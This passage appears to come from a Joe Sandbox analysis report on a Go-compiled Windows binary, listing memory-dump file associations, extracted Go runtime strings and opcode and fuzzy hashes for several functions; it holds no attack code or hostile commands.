            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase$ ?n$ flushGen MB goal, s.state = s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nan$p mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitws2_32.dll not foundpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valueselectgo: bad wakeup$runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64
            • API String ID: 0-2403060387
            • Opcode ID: f501926eede941b22c5ff7c103a1258b44f43002bb3bf6e0cda4933495cd4760
            • Instruction ID: d87f1c7dfc3e3637f2696bd0061d9210c768fb674d433bafad114f294ab74bf5
            • Opcode Fuzzy Hash: f501926eede941b22c5ff7c103a1258b44f43002bb3bf6e0cda4933495cd4760
            • Instruction Fuzzy Hash: B6E1B072604B80C6DB60DF25E4803DEB766F789790F45922AEB9D43BA5DFB8C485CB00
            Function 006DA520 Relevance: 6.5, Strings: 5, Instructions: 298COMMON
            Download Yara Rule
            Strings
            • suspendG from non-preemptible goroutineruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system calltraceback: unexpected SPWRITE function transport endpoint is already connected2006-01-02 15:04:05.999999999 -0700 MSTwmi: cannot load field %q , xrefs: 006DAA4A
            • runtime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked to threadruntime.semacreateruntime.semawakeupsegmentation faultoperation canceledno child processesRFS spec, xrefs: 006DA95A
            • , gp->atomicstatus=marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not foundwinmm.dll not foundruntime: g0 stack [panic during mallocpanic holding locksmissing deferreturnunexpected gp, xrefs: 006DA990
            • , goid= s=nil (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostF, xrefs: 006DA975, 006DA9F7
            • invalid g statuscastogscanstatusbad g transitionschedule: in cgoreflect mismatch untyped locals missing stackmapbad symbol tablenon-Go function not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetF, xrefs: 006DAA39
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: , goid= s=nil (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostF$, gp->atomicstatus=marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not foundwinmm.dll not foundruntime: g0 stack [panic during mallocpanic holding locksmissing deferreturnunexpected gp$invalid g statuscastogscanstatusbad g transitionschedule: in cgoreflect mismatch untyped locals missing stackmapbad symbol tablenon-Go function not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetF$runtime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked to threadruntime.semacreateruntime.semawakeupsegmentation faultoperation canceledno child processesRFS spec$suspendG from non-preemptible goroutineruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system calltraceback: unexpected SPWRITE function transport endpoint is already connected2006-01-02 15:04:05.999999999 -0700 MSTwmi: cannot load field %q
            • API String ID: 0-4112779290
            • Opcode ID: e75ee02e783828e166d087347c4514ae8f2abf3efde0d5b39e23c6302b792c69
            • Instruction ID: bc55dc855dbd152db66db44588e8ff46f61eea2dcf3f8a1ff690c22c9668d08e
            • Opcode Fuzzy Hash: e75ee02e783828e166d087347c4514ae8f2abf3efde0d5b39e23c6302b792c69
            • Instruction Fuzzy Hash: 24D18336A08784C2D750DB66E0417AEBB62F389BD0F499167EF9D03B69CB78C441CB51
            Function 006C1B60 Relevance: 6.4, Strings: 5, Instructions: 177COMMON
            Download Yara Rule
            Strings
            • greyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has, xrefs: 006C1DEF
            • objgc %: gp *(in n= ) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-0, xrefs: 006C1DB6
            • marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not foundwinmm.dll not foundruntime: g0 stack [panic during mallocpanic holding locksmissing deferreturnunexpected gp.parampanic during , xrefs: 006C1DDE
            • base of ) = <==GOGC] = pc=none+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiermssse3avx2bmi1bmi2int8, xrefs: 006C1D9B
            • runtime: marking free object addspecial on invalid pointerruntime: summary max pages = runtime: levelShift[level] = doRecordGoroutineProfile gp1=timeBegin/EndPeriod not foundruntime: sudog with non-nil cgfput: bad status (not Gdead)LockOSThread nesting overflo, xrefs: 006C1D27
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: base of ) = <==GOGC] = pc=none+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiermssse3avx2bmi1bmi2int8$greyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has$marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not foundwinmm.dll not foundruntime: g0 stack [panic during mallocpanic holding locksmissing deferreturnunexpected gp.parampanic during $objgc %: gp *(in n= ) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-0$runtime: marking free object addspecial on invalid pointerruntime: summary max pages = runtime: levelShift[level] = doRecordGoroutineProfile gp1=timeBegin/EndPeriod not foundruntime: sudog with non-nil cgfput: bad status (not Gdead)LockOSThread nesting overflo
            • API String ID: 0-3779596244
            • Opcode ID: 85fdefe8fa9b042fcf6a2bd3dc4341bea943d7c829f715bc63c86ff921f689ed
            • Instruction ID: 810fc677909dde633b393d38e8424a78b7b388af9f8c4b3f5a4ffbc9e79564c2
            • Opcode Fuzzy Hash: 85fdefe8fa9b042fcf6a2bd3dc4341bea943d7c829f715bc63c86ff921f689ed
            • Instruction Fuzzy Hash: FC61C0B2614B84C6DB109F11E4417A9BB66F74BBC0F84512AEF8D0BB66CB7CC6A4C744
            Function 006AC740 Relevance: 6.3, Strings: 5, Instructions: 80COMMON
            Download Yara Rule
            Strings
            • cnt=gcing MB, got= ... max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:ntohsMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthLocalCount-fipsfips-ValueCall GreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunic, xrefs: 006AC7E5
            • -> node= ms cpu, (forced) wbuf1.n= wbuf2.n= s.limit= s.state= B work ( B exp.) marked unmarked in use), size = bad prune, tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)tracebac, xrefs: 006AC825
            • lfstack.push span.limit= span.state=bad flushGen MB stacks, worker mode nDataRoots= nSpanRoots= wbuf1=<nil> wbuf2=<nil> gcscandone runtime: gp= found at *( s.elemsize= B (goal , cons/mark maxTrigger= pages/byte s.sweepgen= allocCount end tracegcProces, xrefs: 006AC84F
            • runtime: lfstack.push invalid packing: node=out of memory allocating heap arena metadata/cpu/classes/scavenge/background:cpu-secondsruntime: unexpected metric registration for gcmarknewobject called while doing checkmarkactive sweepers found at start of mark p, xrefs: 006AC7C5
            • packed=BAD RANK status unknown(trigger= npages= nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole, xrefs: 006AC805
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: -> node= ms cpu, (forced) wbuf1.n= wbuf2.n= s.limit= s.state= B work ( B exp.) marked unmarked in use), size = bad prune, tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)tracebac$ cnt=gcing MB, got= ... max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:ntohsMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthLocalCount-fipsfips-ValueCall GreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunic$ packed=BAD RANK status unknown(trigger= npages= nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole$lfstack.push span.limit= span.state=bad flushGen MB stacks, worker mode nDataRoots= nSpanRoots= wbuf1=<nil> wbuf2=<nil> gcscandone runtime: gp= found at *( s.elemsize= B (goal , cons/mark maxTrigger= pages/byte s.sweepgen= allocCount end tracegcProces$runtime: lfstack.push invalid packing: node=out of memory allocating heap arena metadata/cpu/classes/scavenge/background:cpu-secondsruntime: unexpected metric registration for gcmarknewobject called while doing checkmarkactive sweepers found at start of mark p
            • API String ID: 0-2140812559
            • Opcode ID: e6e004ad6e6e376472ba32d298a97b08a6d435a85c7766abe88b7fae0fa6e129
            • Instruction ID: da318e77ed88cf5810f63d69d61b941067cd995f0078d62b760bc183a27d7b78
            • Opcode Fuzzy Hash: e6e004ad6e6e376472ba32d298a97b08a6d435a85c7766abe88b7fae0fa6e129
